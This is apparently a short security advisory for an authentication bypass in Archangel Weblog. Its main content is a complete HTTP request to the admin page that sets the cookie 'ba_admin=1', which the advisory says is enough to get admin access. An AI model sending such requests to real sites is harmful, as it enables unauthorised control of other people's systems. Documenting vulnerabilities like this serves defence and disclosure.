|
Archangel Weblog Authentication Bypass Vulnerability
This issue can be exploited through use of a web client. The following example HTTP request is sufficient to exploit this issue: GET http://www.example.com/awb/admin/index.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: ba_admin=1 Cache-Control: max-age=0 |
|
|
Privacy Statement |
